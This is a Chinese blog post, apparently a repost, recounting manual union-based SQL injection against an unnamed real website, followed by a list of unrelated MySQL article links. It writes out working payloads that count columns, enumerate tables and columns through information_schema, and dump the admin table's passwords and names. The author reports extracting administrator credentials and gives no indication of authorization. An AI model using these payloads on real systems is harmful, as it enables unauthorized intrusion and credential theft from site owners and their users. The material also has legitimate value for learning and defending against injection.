博客
关于我
mysql手工注入
阅读量:789 次
发布时间:2023-02-12

本文共 1322 字,大约阅读时间需要 4 分钟。

MySQL手工注入实践:从数据库信息到管理员密码的过程

在进行网络安全测试时,MySQL手工注入是一个非常实用的技能。近期,我尝试在某个网站上实践这一技术,过程颇为有趣,也让我对数据库安全有了更深入的理解。

初始测试与数据库信息获取

首先,我在网站的URL后直接追加了一些特殊字符,发现页面返回了500级错误。这表明该网站可能存在SQL注入漏洞,值得进一步测试。

为了获取数据库信息,我首先尝试通过order by语句查看数据库中的字段数量。通过这种方式,我可以了解数据库中存储了多少种不同的数据类型。

随后,我尝试使用and 1=2 union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema = database()的语句。这个语句的目的是从information_schema.tables表中获取数据库中的表名。执行后,我发现了admin表,这让我对接下来要获取的信息有了更明确的方向。

从表名到字段信息

使用group_concat函数,我能够从information_schema.columns表中获取特定表的字段信息。具体来说,我执行了以下语句:

and 1=2 union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name = 0x61646D696E

这里,0x61646D696E对应的字符串是admin表的表名。执行该语句后,我得知admin表中包含与用户名和密码相关的字段。

提取管理员账号信息

为了获取管理员账号的具体信息,我分别从admin表中提取admin_passwordadmin_firstnameadmin_lastname字段的值。以下是具体的语句:

and 1=2 union select 1,group_concat(admin_password),3,4,5,6,7,8 from admin
and 1=2 union select 1,group_concat(admin_firstname),3,4,5,6,7,8 from admin
and 1=2 union select 1,group_concat(admin_lastname),3,4,5,6,7,8 from admin

通过这些语句,我成功地提取出了管理员的用户名和部分密码信息。需要注意的是,密码信息涉及到了多次MD5加密,包括使用不同的盐值,这使得密码的解密过程更加复杂。

总结与展望

通过上述步骤,我不仅验证了网站存在SQL注入漏洞,还成功地从数据库中提取出了大量有价值的信息。当然,密码的解密过程仍然需要进一步的研究和尝试,但这一次实践让我对MySQL注入的实际应用有了更深刻的理解。

在今后的网络安全测试中,我会继续练习这种手工注入技术,同时也会关注如何防范类似的安全漏洞。毕竟,预防措施才能真正保护好我们的数据安全。

转载地址:http://wbdfk.baihongyu.com/

你可能感兴趣的文章
mysql启动以后会自动关闭_驾照虽然是C1,一直是开自动挡的车,会不会以后就不会开手动了?...
查看>>
mysql启动和关闭外键约束的方法(FOREIGN_KEY_CHECKS)
查看>>
Mysql启动失败解决过程
查看>>
MySQL启动失败:Can't start server: Bind on TCP/IP port
查看>>
mysql启动报错
查看>>
mysql启动报错The server quit without updating PID file几种解决办法
查看>>
MySQL命令行登陆,远程登陆MySQL
查看>>
mysql命令:set sql_log_bin=on/off
查看>>
mySQL和Hive的区别
查看>>
MySQL和Java数据类型对应
查看>>
mysql和oorcale日期区间查询【含左右区间问题】
查看>>
MySQL和SQL入门
查看>>
mysql在centos下用命令批量导入报错_Variable ‘character_set_client‘ can‘t be set to the value of ‘---linux工作笔记042
查看>>
Mysql在Linux运行时新增配置文件提示:World-wrirable config file ‘/etc/mysql/conf.d/my.cnf‘ is ignored 权限过高导致
查看>>
Mysql在Windows上离线安装与配置
查看>>
MySQL在渗透测试中的应用
查看>>
Mysql在离线安装时启动失败:mysql服务无法启动,服务没有报告任何错误
查看>>
Mysql在离线安装时提示:error: Found option without preceding group in config file
查看>>
MySQL基于SSL的主从复制
查看>>
Mysql基本操作
查看>>